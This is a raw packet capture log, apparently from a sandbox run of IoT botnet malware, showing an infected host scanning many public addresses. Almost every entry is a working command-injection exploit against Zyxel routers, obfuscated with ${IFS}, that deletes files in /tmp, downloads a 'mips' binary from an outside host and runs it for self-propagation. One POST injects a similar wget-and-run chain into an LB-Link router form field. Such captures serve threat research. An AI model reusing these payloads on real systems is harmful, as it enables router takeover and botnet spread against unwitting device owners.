                              Mar 31, 2024 08:42:23.555413961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9675192.168.2.1340342171.170.147.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555448055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9676192.168.2.1334722140.219.175.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555485964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9677192.168.2.135228817.253.241.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555537939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9678192.168.2.1340514204.219.82.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555561066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9679192.168.2.133926060.46.246.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555633068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9680192.168.2.1350078217.119.22.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555641890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9681192.168.2.1358078146.11.17.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555674076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9682192.168.2.135918012.36.110.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555742979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9683192.168.2.133816244.55.183.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555802107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9684192.168.2.1357544187.120.218.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555866957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9685192.168.2.135091220.235.168.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555900097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9686192.168.2.134086687.240.182.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555943966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9687192.168.2.133685232.49.67.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555988073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9688192.168.2.1332834196.44.136.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.556036949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9689192.168.2.1342676132.12.28.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.556066990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9690192.168.2.1354368207.163.22.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.556127071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9691192.168.2.135326013.206.44.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.556163073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9692192.168.2.13597484.168.121.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.556178093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9693192.168.2.1353794175.25.103.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.556227922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9694192.168.2.133592854.255.17.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.556297064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9695192.168.2.1339364172.198.149.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.556330919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9696192.168.2.1340754146.39.24.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.556365967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9697192.168.2.1358406100.157.9.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:25.566932917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9698192.168.2.1352154161.234.47.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:25.566998959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9699192.168.2.1338618166.146.40.838080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:25.809851885 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:26.037125111 CEST38INHTTP/1.1 404 Not Found


                              Session IDSource IPSource PortDestination IPDestination Port
                              9700192.168.2.133461074.252.248.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.571916103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9701192.168.2.1355280115.215.237.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.571938992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9702192.168.2.1336646166.79.130.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.571980000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9703192.168.2.1348256172.180.197.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572043896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9704192.168.2.1337234189.72.160.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572077990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9705192.168.2.134807688.145.129.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572108984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9706192.168.2.1346422123.126.131.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572149038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9707192.168.2.1346300111.208.26.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572210073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9708192.168.2.1339292223.254.65.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572241068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9709192.168.2.134774482.155.144.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572285891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9710192.168.2.1356048116.134.251.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572325945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9711192.168.2.1357802137.55.133.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572359085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9712192.168.2.1349714173.235.67.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572385073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9713192.168.2.1336268114.212.208.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572432995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9714192.168.2.135372848.243.45.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572437048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9715192.168.2.133951657.113.2.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572474003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9716192.168.2.135238870.61.173.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572499990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9717192.168.2.1343548195.41.213.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572516918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9718192.168.2.1354966144.88.70.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572582006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9719192.168.2.134296450.112.234.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572619915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9720192.168.2.133470266.31.94.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572642088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9721192.168.2.1355168100.43.184.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572695971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9722192.168.2.1337078182.238.63.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.572716951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9723192.168.2.1334896124.252.133.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:26.573056936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9724192.168.2.1334968140.3.196.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581104994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9725192.168.2.1337206117.164.95.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581147909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9726192.168.2.134629644.210.67.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581188917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9727192.168.2.1337836181.36.210.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581222057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9728192.168.2.1359336223.130.122.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581267118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9729192.168.2.1342410126.52.251.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581325054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9730192.168.2.1342882142.39.26.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581360102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9731192.168.2.1358990178.102.202.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581418991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9732192.168.2.1345694155.105.73.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581449986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9733192.168.2.1344566163.66.99.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581506968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9734192.168.2.1345730173.183.188.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581536055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9735192.168.2.1342152196.222.234.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581585884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9736192.168.2.1340626176.238.62.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581618071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9737192.168.2.1348074164.231.8.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581655979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9738192.168.2.133353695.36.38.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581707954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9739192.168.2.1347712166.146.64.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581737041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9740192.168.2.1360204179.43.2.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581784964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9741192.168.2.1355940189.72.45.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.581865072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9742192.168.2.135146465.6.172.214443
                              TimestampBytes transferredDirectionData
